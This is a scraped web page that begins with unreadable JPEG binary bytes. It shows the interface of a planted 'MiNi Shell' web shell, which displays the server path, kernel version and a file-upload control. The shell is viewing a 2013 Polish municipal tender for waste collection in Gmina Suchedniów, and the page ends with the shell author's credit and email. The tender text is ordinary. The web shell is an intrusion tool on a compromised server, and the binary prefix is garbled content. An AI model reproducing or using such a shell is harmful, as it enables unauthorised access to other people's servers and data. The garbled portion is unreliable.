JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20130514/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20130514/75539-N-2013.html

<p class="kh_header"><b>Suchedniów: ODBIÓR, TRANSPORT I ZAGOSPODAROWANIE ODPADÓW KOMUNALNYCH POCHODZĄCYCH Z  NIERUCHOMOŚCI ZAMIESZKANYCH NA TERENIE GMINY SUCHEDNIÓW   W LATACH 2013 - 2014</b><br>
<b>Numer ogłoszenia: 75539 - 2013; data zamieszczenia: 14.05.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Suchedniów , ul. Fabryczna 5, 26-130 Suchedniów, woj. świętokrzyskie, tel. 041 2543002, 2543485, faks 041 2543485.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.suchedniow.bip.doc.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> ODBIÓR, TRANSPORT I ZAGOSPODAROWANIE ODPADÓW KOMUNALNYCH POCHODZĄCYCH Z  NIERUCHOMOŚCI ZAMIESZKANYCH NA TERENIE GMINY SUCHEDNIÓW   W LATACH 2013 - 2014.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> I.Lokalizacja inwestycji :                                   
GMINA SUCZEDNIÓW 26-130 Suchedniów , powiat skarżyski, województwo świętokrzyskie
II.Opis przedmiotu zamówienia 
OPIS  TECHNICZNY OPIS PRZEDMIOTU ZAMÓWIENIA :
ODBIÓR, TRANSPORT I ZAGOSPODAROWANIE ODPADÓW KOMUNALNYCH POCHODZĄCYCH Z  NIERUCHOMOŚCI ZAMIESZKANYCH NA TERENIE GMINY SUCHEDNIÓW   W LATACH 2013 - 2014
OPIS PRZEDMIOTU ZAMÓWIENIA : Przedmiot zamówienia obejmuje odbiór, transport i zagospodarowanie odpadów komunalnych pochodzących z nieruchomości zamieszkałych na terenie gminy Suchedniów
Odbiorem zostaną objęte 
-odpady komunalne zbierane w sposób nieselektywny /zmieszane odpady komunalne/,
-odpady komunalne zbierane w sposób selektywny /u źródła/ z podziałem   na frakcje:  
-tektura i papier,
-szkło,
-tworzywa sztuczne
-odpady wielkogabarytowe, / m.innymi stare meble/,
-zużyte opony  
-popiół  
-odpady ulegające biodegradacji 

Szacunkowa łączna ilość odpadów komunalnych mających zostać odebranych, przetransportowanych  i zagospodarowanych z terenu gminy wynosi: 1548 Mg  z podziałem na następujące frakcje:
DANE DO WYCENY OFERTY:
Papier i tektura -                            		       30,00	Mg
Tworzywa sztuczne -                   	  	       	       60,00	Mg
Opakowanie szklane -                    		       40,00	Mg
Odpady wielkogabarytowe -           		       20,00	Mg
Zużyte opony   -                            		                     25,00	Mg
Popiół -                                                                               50,00	Mg  
Odpady ulegające biodegradacji -                                 10,00	Mg 
 Zmieszane odpady komunalne -		    1313,00	 Mg
   
                           
                   Razem                                                   1548,00               Mg

UWAGA: Przedstawione  ilości odpadów komunalnych są wielkościami szacunkowymi jako średnia z ostatnich 3 lat i służą do wyliczenia wartości oferty i oceny ofert.
Rozliczenie będzie dokonywane na podstawie rzeczywistych wielkości i cen jednostkowych zł./Mg w rozbiciu na odpady segregowane i niesegregowane  Wynagrodzenie płatne będzie za rzeczywiście wykonane usługi, co miesiąc /koniec miesiąca/ na podstawie faktury VAT, wraz z kopią dowodów dostarczania odpadów do instalacji odzysku lub unieszkodliwiania, tj. karty ewidencji odpadów lub karty przekazania odpadów wraz z dokumentami wagowymi. 

2.Dane dotyczące Gminy Suchedniów, istotne z punktu widzenia zamówienia
1/Łączna liczba mieszkańców Gminy Suchedniów   wynosi - 10680
z czego 8705 w zabudowie jednorodzinnej oraz 1975  w zabudowie wielorodzinnej. Jest to  maksymalna liczba osób w okresie obowiązywania zamówienia.
2/liczba gospodarstw domowych wynosi  - 3001 z czego 2491 w zabudowie jednorodzinnej oraz 600 w zabudowie  wielorodzinnej 
3/liczba budynków jednorodzinnych wynosi - 2228 
4/liczba budynków wielorodzinnych - 28
5/Długość dróg na terenie gminy wynosi łącznie:
-Drogi gminne 			52, 60    km,
-Drgi powiatowe 		12,50     km,
-Drogi wojewódzkie 		   6,60    km,
-Drogi wewnętrzne   		   1,10    km
3 Zakres usług:
  Odbiór odpadów komunalnych odbywać ma się według następujących zasad-
1/ZABUDOWA  JEDNORODZINNA 
 Na terenie zabudowy jednorodzinnej obwiązywał będzie system mieszany workowo - pojemnikowy zbiórki odpadów komunalnych.
a/zmieszane odpady komunalne- Zmieszane odpady komunalne gromadzone będą w pojemnikach metalowych lub  z tworzywa sztucznego o pojemności minimum 120 l w przypadku ich braku     w workach / pojemniki i worki zapewni właściciel nieruchomości / 
b/odpady komunalne zbierane w sposób selektywny  w systemie   workowym będą gromadzone w workach                     w następujących kolorach:
-KOLORZE ŻÓŁTYM	 - odpady opakowaniowe z tworzyw sztucznych, worek 120 l
-KOLORZE BIAŁYM 	 -  opakowania szklane bezbarwne, worek 120 l 
-KOLORZE RÓŻOWYM	 -  opakowania szklane kolorowe, worki 120 l
-KOLORZE NIEBIESKIM	 - opakowania z papieru i makulatura, worki 120 l
-KOLORZE ZIELONYM  		- odpady ulegające biodegradacji, worki 120 l
  POPIÓŁ -  pojemnik metalowy 120 l  /zapewnia właściciel nieruchomości / 
c/OPONY
d/ODPADY WIELOGABARYTOWE
UWAGA :       Worki zapewnia właściciel nieruchomości 
Częstotliwość  wywozu przez wykonawcę odpadów zebranych selektywnie i odpadów zmieszanych  regulował będzie podany niżej harmonogram: 
1 i 3 poniedziałek  roboczy każdego miesiąca : ul. Langiewicza, Przechodnia, Graniczna, Jarzębinowa,   Źródłowa, , Słoneczna, i Mostki 
1 i 3 wtorek roboczy każdego miesiąca: ul. Warszawska, Harcerska, Partyzantów,        Młynarska, Jodłowa, Świerkowa, Wrzosowa, Kielecka, Kopalniana, Zagórska,  Topolowa, Warszawska - Gajówka- Rejów 
1 i 3 środa robocza każdego miesiąca: ul  Bodzentyńska, Ogrodowa, Pasternik,    Żeromskiego, Krzyżka, Ostojów, 
1 i 3 czwartek roboczy każdego miesiąca: ul Berezów, Koszykowa, Sportowa,   Choroszewskiego, Leśna, Józefów, Placowa, Michniów
1 i 3 piątek roboczy każdego miesiąca: ul Stokowiec, Szeroka, Bugaj, Cmentarna,   Dawidowicza, Niska, Dworcowa, Staszica, Traugutta, Gajzlera, Szarych Szeregów,  Kościelna, Przejściowa,  Powstańców 1863 r., Oś. Piłsudskiego, Fabryczna, Spokojna, Porzeczkowa,  Poziomkowa, Jagodowa
1 i 3 sobota robocza każdego miesiąca: ul Kościuszki, Krótka, E. Peck, Poziomskiego,   Słowackiego, Suchyni, Oś. Jasna I, Oś. Jasna II, Mickiewicza, Nowa, Jasna
Opakowania plastikowe: każdy ostatni roboczy piątek miesiąca
Opakowania szklane: ostatni roboczy czwartek kwartału
Odpady ulegające biodegradacji w miesiącach maj, czerwiec, lipiec, sierpień, wrzesień,w każdą ostatnią sobotę miesiąca 
Popiół - w miesiącach październik, listopad, grudzień, styczeń, luty, marzec: w każdą ostatnią sobotę miesiąca 
Odpady wielkogabarytowe  dwa razy w roku ostatnia środa półrocza
Opakowania z papieru i makulatura - dwa razy w roku ostatni roboczy wtorek półrocza 
Opony - ostatni roboczy czwartek kwietnia i listopada 
Odbiór odpadów odbywał się będzie  sprzed posesji.
Odpady budowlane: gospodarka odpadami budowlanymi nie jest przedmiotem niniejszego zamówienia i odbywać się będzie w oparciu o indywidualne umowy cywilno- prawne zawierane pomiędzy podmiotem wykonującym prace remontowo - budowlane,  a właścicielami nieruchomości u którego te prace są wykonywane lub między właścicielami, a uprawnionymi do odbioru odpadów przedsiębiorcami.
4.ZABUDOWA WIELORODZINNA 
Na terenie zabudowy wielorodzinnej obowiązywał będzie system pojemnikowy 
a/zmieszane odpady komunalne 
Zmieszane odpady komunalne gromadzone będą w pojemnikach w ilości 30 szt.   o pojemności  1100 l, które  zostaną ustawione w 9 altankach lub w miejscach utwardzonych obok altanek.
Pojemniki koloru ciemnego - częstotliwość wywozu dwa razy  w tygodniu./ wtorek -  piątek/.
Pojemniki zapewnia WYKONAWCA 
b/selektywnie zbierane odpady komunalne 
Selektywna zbiórka odpadów komunalnych na terenie zabudowy wielorodzinnej odbywać się będzie do specjalistycznych pojemników:
-KOLOR BIAŁY - pojemnik na szkło bezbarwne - 9 szt. o pojemności 1100 l do każdej altanki
-KOLOR  RÓŻOWY - pojemnik na szkło kolorowe - 9 szt. o pojemności 1100 l do każdej altanki 
-KOLOR NIEBIESKI - pojemnik na papier  - 9 szt. o pojemności 1100 l. do każdej altanki 
-KOLOR ŻÓŁTY - pojemnik na tworzywa sztuczne - 9 szt. o pojemności 1100 l do każdej altanki.
c/opony
d/odpady wielkogabarytowe 
Odbiór odpadów wielkogabarytowych będzie się odbywał poprzez odbieranie wystawionych w/w odpadów przez właścicieli przy altankach w  tych samych terminach co w budynkach jednorodzinnych.
 Częstotliwość wywozu -  w tym samym czasie co w budynkach jednorodzinnych.
e/odpady budowlane 
Gospodarka odpadami budowlanymi nie jest przedmiotem niniejszego zamówienia  i odbywać się będzie   w oparciu o indywidualne umowy cywilno- prawne zawierane pomiędzy podmiotami wykonującymi prace remontowo budowlane mieszkań lub między ich właścicielami, a uprawnionymi do odbioru odpadów przedsiębiorcami. 
Pojemniki zapewnia WYKONAWCA na czas realizacji zamówienia.
UWAGA: Wykonawca przed złożeniem oferty winien dokonać wizji w terenie w celu zapoznania się  z warunkami lokalnymi i specyfiką terenu gminy Suchedniów.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 90.00.00.00-7, 90.50.00.00-2, 90.51.10.00-2, 90.53.30.00-2, 90.51.40.00-3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 01.07.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 10000,00 zł. słownie: dziesięć tysiecy zł.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawcy złożą oświadczenie o spełnieniu przedmiotowego warunku - wg załącznika nr 1 do SIWZ oraz załączą zezwolenia na świadczenie usług w zakresie odbioru odpadów, lub wpis do rejestru działalności regulowanej w zakresie odbierania odpadów komunalnych od właścicieli nieruchomości.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawcy złożą oświadczenie o spełnieniu przedmiotowego warunku - wg załącznika nr 1 do SIWZ oraz załączą Wykonawca wykaz, że w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy, w tym okresie - wykonał lub wykonuje usługi odbierania odpadów komunalnych z nieruchomości, na których zamieszkują mieszkańcy, o masie łącznej odebranych odpadów komunalnych w ciągu następujących po sobie 12 miesięcy, co najmniej 500 Mg. Potwierdzone, że usługi wykonywane bądź wykonane zostały należycie.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawcy złożą oświadczenie o spełnieniu przedmiotowego warunku - wg załącznika nr 1 do SIWZ oraz załączą 
-wykaz pojazdów dostępnych wykonawcy w celu realizacji zamówienia wraz z informacją o podstawie dysponowania tymi zasobami - minimum co najmniej dwa pojazdy przystosowane do odbierania zmieszanych odpadów komunalnych oraz co najmniej dwa pojazdy przystosowane do odbierania selektywnie zebranych odpadów komunalnych, a także co najmniej jeden pojazd do odbierania odpadów bez funkcji kom paktującej,
-oświadczenie o  dysponowaniu na terenie bazy magazynowo-transportowej urządzeniami do selektywnego gromadzenia odpadów komunalnych przed transportem do miejsc przetwarzania,
-dysponowaniu bazą magazynowo-transportową usytuowaną w gminie, z terenu której odbiera te odpady, lub odległości nie większej niż 60 km od granicy tej gminy,
-posiadaniu tytułu prawnego do terenu, na którym zlokalizowano bazę magazynowo-transportową.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawcy złożą oświadczenie o spełnieniu przedmiotowego warunku - wg załącznika nr 1 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawcy złożą oświadczenie o spełnieniu przedmiotowego warunku - wg załącznika nr 1 do SIWZ oraz załączą opłaconą polisę, a w przypadku jej braku innego dokumentu potwierdzającego, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że inny podmiot jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1/Formularz ofertowy,
2/Oświadczenia :
a/Oświadczenie o zapoznaniu się terenem na którym wykonywana będzie usługa.
b/Oświadczenie o przyjęciu warunków umowy załączonej do niniejszej specyfikacji
c/Oświadczenie o związaniu złożoną ofertą przez okres 30 dni licząc od daty upływu składania ofert.
d/Oświadczenie, że wyliczona wartość brutto zadania jest kompletna i że jej wyliczenie nastąpiło w oparciu               o, Specyfikację Istotnych Warunków Zamówienia, wizję lokalną i posiadaną przez oferenta wiedzę techniczną
 e/Informacja czy oferent będzie wykonywał przedmiot w całości osobiście, czy też  za    pomocą
            podwykonawców /ze wskazaniem zakresu rzeczowego który wykonywany będzie przez podwykonawcę/.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.suchedniow.bip.doc.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urzad Miasta i Gminy w Suchedniowie - ul. Fabryczna 5, 26-130 Suchedniów (parter) pok. nr 7.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 24.05.2013 godzina 09:30, miejsce: Urzad Miasta i Gminy w Suchedniowie - ul. Fabryczna 5, 26-130 Suchedniów (parter) pok. nr 7.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com